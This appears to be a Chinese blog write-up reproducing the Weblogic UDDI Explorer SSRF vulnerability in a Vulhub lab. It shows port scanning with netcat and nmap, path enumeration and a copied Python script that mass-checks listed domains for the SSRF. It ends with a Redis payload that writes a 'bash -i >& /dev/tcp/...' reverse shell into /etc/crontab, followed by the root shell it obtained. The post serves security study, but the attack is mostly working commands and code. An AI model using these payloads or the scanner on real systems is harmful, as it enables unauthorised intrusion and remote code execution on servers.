vulhub Weblogic SSRF漏洞 复现
2019-08-15 本文已影响0人
违规昵称不予展示
环境和介绍请到Vulhub查看
假装自己在闲逛,发现了一个网址http://10.20.7.7
好的先来一个全端口扫描,用我最近学会的新玩具netcat
root@Sanqiushu:~# nc -z -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
----------
获取一下banner信息
root@Sanqiushu:~# echo "" | nc -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
------------
对比一下nmap
root@Sanqiushu:~# nmap 10.20.7.7 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 15:09 CST
Nmap scan report for 10.20.7.7
Host is up (0.000077s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
4444/tcp filtered krb524
7001/tcp open afs3-callback
MAC Address: 08:00:27:F1:8C:A9 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds
发现一个7001端口,浏览器访问一下
image.png
没啥发现,那就扫一下路径
PS F:\SecTools\apps\dirsearch-master\dirsearch-master> ./dirsearch.py -u http://10.20.7.7:7001/ -e jsp
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: jsp | HTTP method: get | Threads: 10 | Wordlist size: 6074
Error Log: F:\SecTools\apps\dirsearch-master\dirsearch-master\logs\errors-19-08-15_15-00-35.log
Target: http://10.20.7.7:7001/
[15:00:35] Starting:
[15:00:41] 302 - 273B - /bea_wls_internal -> http://10.20.7.7:7001/bea_wls_internal/
[15:00:41] 200 - 0B - /bea_wls_internal/HTTPClntRecv
[15:00:41] 500 - 2KB - /beanManaged
[15:00:41] 500 - 2KB - /bea_wls_internal/HTTPClntSend
[15:00:41] 500 - 2KB - /bea_wls_internal/iiop/ClientClose
[15:00:41] 500 - 2KB - /bea_wls_internal/iiop/ClientLogin
[15:00:41] 200 - 0B - /bea_wls_internal/iiop/ClientRecv
[15:00:41] 500 - 2KB - /Bigdump.jsp
[15:00:41] 500 - 2KB - /bea_wls_internal/iiop/ClientSend
[15:00:42] 200 - 416B - /console
[15:00:42] 200 - 418B - /console/
[15:00:42] 200 - 435B - /console/base/config.json
[15:00:42] 200 - 440B - /console/payments/config.json
[15:00:42] 200 - 437B - /console/j_security_check
[15:00:54] 302 - 265B - /uddiexplorer -> http://10.20.7.7:7001/uddiexplorer/
[15:00:54] 302 - 249B - /uddi -> http://10.20.7.7:7001/uddi/
[15:00:55] 200 - 855B - /uddi/uddilistener
Task Completed
PS F:\SecTools\apps\dirsearch-master\dirsearch-master>
发现不少路径访问一下看看
发现一个UDDI Explorer
这个漏洞影响的版本是weblogic 10.0.2 -- 10.3.6
这里看不到版本很难受
直接测试吧
image.png
随便搜索点啥
image.png
burp拦截请求,右键发送到Repeater
image.png
这里改成测试地址
image.png
服务器返回404,很好
然后探测内网服务
脚本见https://www.jianshu.com/p/97b157a20108(我没试过)
复制过来一下
import re
import sys
import Queue
import requests
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
queue = Queue.Queue()
mutex = threading.Lock()
class Test(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def check(self,domain,ip):
payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)
url = domain + payload
try:
html = requests.get(url=url, timeout=15, verify=False).content
m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)
if m:
mutex.acquire()
with open('ssrf1.txt','a+') as f:
print "%s has weblogic ssrf." % domain
f.write("%s has weblogic ssrf." % domain)
mutex.release()
except Exception,e:
print e
def get_registry(self,domain):
payload = 'uddiexplorer/SetupUDDIExplorer.jsp'
url = domain + payload
try:
html = requests.get(url=url, timeout=15, verify=False).content
m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)
if m:
return m.group(1)
except Exception,e:
print e
def run(self):
while not self.queue.empty():
domain = self.queue.get()
mutex.acquire()
print domain
mutex.release()
ip = self.get_registry(domain)
self.check(domain,ip)
self.queue.task_done()
if __name__ == '__main__':
with open('domain.txt','r') as f:
lines = f.readlines()
for line in lines:
queue.put(line.strip())
for x in xrange(1,50):
t = Test(queue)
t.setDaemon(True)
t.start()
queue.join()
这里发现一个6379的服务(咋知道这是啥服务呢?)
image.png
直接redis的payload打过去就好了
监听的机器等好一会就收到连接了
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 45976
bash: no job control in this shell
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]#
payload 原本长这样
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.20.7.7/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
发送的时候进行url编码了,post的话好像没啥必要